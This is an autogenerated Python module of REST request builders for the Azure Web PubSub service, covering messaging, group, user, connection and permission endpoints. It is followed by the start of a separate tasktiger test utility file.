Azure/azure-cli-extensions
|
c1615b19930bba7166c282918f166cd40ff6609c
|
b8c2cf97e991adf0c0a207d810316b8f4686dc29
|
refs/heads/main
| 2023-08-24T12:40:15.528432
| 2023-08-24T09:17:25
| 2023-08-24T09:17:25
| 106,580,024
| 336
| 1,226
|
MIT
| 2023-09-14T10:48:57
| 2017-10-11T16:27:31
|
Python
|
UTF-8
|
Python
| false
| false
| 38,376
|
py
|
rest.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
__all__ = [
'build_add_connection_to_group_request',
'build_add_user_to_group_request',
'build_connection_exists_request',
'build_group_exists_request',
'build_check_permission_request',
'build_user_exists_request',
'build_close_client_connection_request',
'build_grant_permission_request',
'build_healthapi_get_health_status_request',
'build_remove_connection_from_group_request',
'build_remove_user_from_all_groups_request',
'build_remove_user_from_group_request',
'build_revoke_permission_request',
'build_send_to_all_request',
'build_send_to_connection_request',
'build_send_to_group_request',
'build_send_to_user_request'
]
from typing import TYPE_CHECKING
from msrest import Serializer
from azure.core.pipeline.transport._base import _format_url_section
from .core.rest import HttpRequest
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, IO, List, Optional, Union, Dict
from typing_extensions import Literal
Permissions = Union[Literal['joinLeaveGroup'], Literal['sendToGroup']] # pylint: disable=unsubscriptable-object
_SERIALIZER = Serializer()
def build_healthapi_get_health_status_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Get service health status.
Get service health status.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/health')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_all_request(
hub, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Broadcast content inside request body to all the connected client connections.
Broadcast content inside request body to all the connected client connections.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
excluded = kwargs.pop('excluded', None) # type: Optional[List[str]]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if excluded is not None:
query_parameters['excluded'] = [_SERIALIZER.query("excluded", q, 'str') if q is not None else '' for q in excluded]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_connection_exists_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if the connection with the given connectionId exists.
Check if the connection with the given connectionId exists.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_close_client_connection_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Close the client connection.
Close the client connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword reason: The reason closing the client connection.
:paramtype reason: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
reason = kwargs.pop('reason', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if reason is not None:
query_parameters['reason'] = _SERIALIZER.query("reason", reason, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_connection_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to the specific connection.
Send content inside request body to the specific connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_group_exists_request(
hub, # type: str
group, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if there are any client connections inside the given group.
Check if there are any client connections inside the given group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_group_request(
hub, # type: str
group, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to a group of connections.
Send content inside request body to a group of connections.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
excluded = kwargs.pop('excluded', None) # type: Optional[List[str]]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if excluded is not None:
query_parameters['excluded'] = [_SERIALIZER.query("excluded", q, 'str') if q is not None else '' for q in excluded]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_add_connection_to_group_request(
hub, # type: str
group, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Add a connection to the target group.
Add a connection to the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_connection_from_group_request(
hub, # type: str
group, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a connection from the target group.
Remove a connection from the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_user_exists_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if there are any client connections connected for the given user.
Check if there are any client connections connected for the given user.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_user_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to the specific user.
Send content inside request body to the specific user.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: The user Id.
:type user_id: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_add_user_to_group_request(
hub, # type: str
group, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Add a user to the target group.
Add a user to the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_user_from_group_request(
hub, # type: str
group, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a user from the target group.
Remove a user from the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_user_from_all_groups_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a user from all groups.
Remove a user from all groups.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_grant_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Grant permission to the connection.
Grant permission to the connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup.
:type permission: str or ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, grant the permission to all the targets. If set,
grant the permission to the specific target. The meaning of the target depends on the specific
permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_revoke_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Revoke permission for the connection.
Revoke permission for the connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup.
:type permission: str or ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, revoke the permission for all targets. If set,
revoke the permission for the specific target. The meaning of the target depends on the
specific permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_check_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if a connection has permission to the specified action.
Check if a connection has permission to the specified action.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup.
:type permission: ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, get the permission for all targets. If set, get the
permission for the specific target. The meaning of the target depends on the specific
permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
|
00b88bff3210d4acc652c07da75c700f442397bd
|
f6b0151d060baa65e09fc84f2761042dae49aa2a
|
/tests/utils.py
|
582250cb32db9db42c1af31d557ffab34490380b
|
[
"MIT"
] |
permissive
|
closeio/tasktiger
|
8e5686120f7432b0aa01f667f484412e07e0c985
|
1e1672f2293f845c735b5e0c3277458552becbe7
|
refs/heads/master
| 2023-08-28T03:53:50.303526
| 2023-08-24T10:29:36
| 2023-08-24T10:29:36
| 35,581,334
| 1,344
| 94
|
MIT
| 2023-09-11T10:42:08
| 2015-05-14T00:26:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,418
|
py
|
utils.py
|
import datetime
import logging
import time
import redis
import structlog
from tasktiger import TaskTiger, Worker, fixed
from .config import DELAY, REDIS_HOST, TEST_DB
TEST_TIGER_CONFIG = {
# We need this 0 here so we don't pick up scheduled tasks when
# doing a single worker run.
"ACTIVE_TASK_UPDATE_TIMEOUT": 2 * DELAY,
